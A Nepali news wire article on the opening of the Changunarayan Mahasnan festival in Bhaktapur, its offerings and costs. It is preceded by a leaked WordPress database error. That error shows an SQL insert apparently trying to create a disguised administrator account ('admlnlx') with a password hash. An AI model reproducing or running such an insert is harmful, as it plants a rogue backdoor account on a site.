WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BPrlpDs74M0gXObtidJ/pR1P0aD03I1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-24 20:40:18', '', 'admlnlx', 'admlnlx')
भक्तपुर,मंसिर २६ –
मकै, कोदो, फापर र मस्याङबाहेकका सबै अन्न चढाई एक सातासम्म मनाइने चाँगुनारायण महास्थान पर्व आजदेखि सुरु भएको छ ।
लिच्छविकालीन राजा मानदेवको पालादेखि चाँगुनारायण मन्दिरमा सञ्चालन हुंँदै आएको महास्नान पर्वमा झन्डै एक ट्रक अनाज चढाएर पूजा गरी भडेलभोजको समेत आयोजना गरिन्छ । पर्व शनिबार एकादशी पर्वको साँझ निमन्त्रण पूजा गरी राष्ट्र प्रमुखका रूपमा राष्ट्रपतिले सङ्कल्प गरेको पगरी र जटाधारी नरिवल चाँगुनारायणलाई अर्पण गरिएपछि पर्व सुरु भएको हो ।
मङ्सिर शुक्ल पक्ष द्वादशीका दिन भारतको काशीबाट भगवान् बद्रीनाथ चाँगुनारायण आउने जनविश्वास एवम् किंबदन्तीका आधारमा वाग्मतीबाट ल्याइएको जल तथा पञ्चामृतबाट महास्नान पर्व चलाइने परम्परा रहेको चाँगुनारायण मन्दिरका मूल पुजारी चक्रधरानन्द राजोपाध्यायले बताउनुभयो ।
महास्नान पर्वमा आठ धार्नी घिउ, आठ धार्नी चिनी तथा पाँच पाँच पाथी दही, दूध र महले चाँगुनारायणलाई महास्नान गराउने परम्परा छ । यही मङ्सिर ३० गतेसम्म मनाइने सो पर्वमा २६ मुरी चिउरा, १४ मुरी स्याबजी, १६ प्रकारका गेडागुडी, ३५ पाथी दही, १६ –१६ धार्नी घिउ, चिनी र मह, ३० पाथी तेल लगायत सामग्री एवम् परिकार चढाइने गरिन्छ ।
यस वर्ष गुठी संस्थान भक्तपुरले करिब रु आठ लाख खर्च भएको जानकारी दिँदै बलिका लागि दुई राँगा, नौ बोका, एक एक कालो र सेतो भेडा, ३१ हाँस, २६ मुरी १० पाथी चिउरा, २० मुरी सात पाथी सात माना चामल, चार तोला चाँदी, सात मासा सुन, दुई किलो ७४ ग्राम पित्तल, पाँच किलो ७७५ ग्राम तामालगायत १०९ थरी विभिन्न सामान उपलब्ध गराइएको संस्थानका प्रमुख लेखनाथ सापकोटाले जानकारी दिनुभयो । – रासस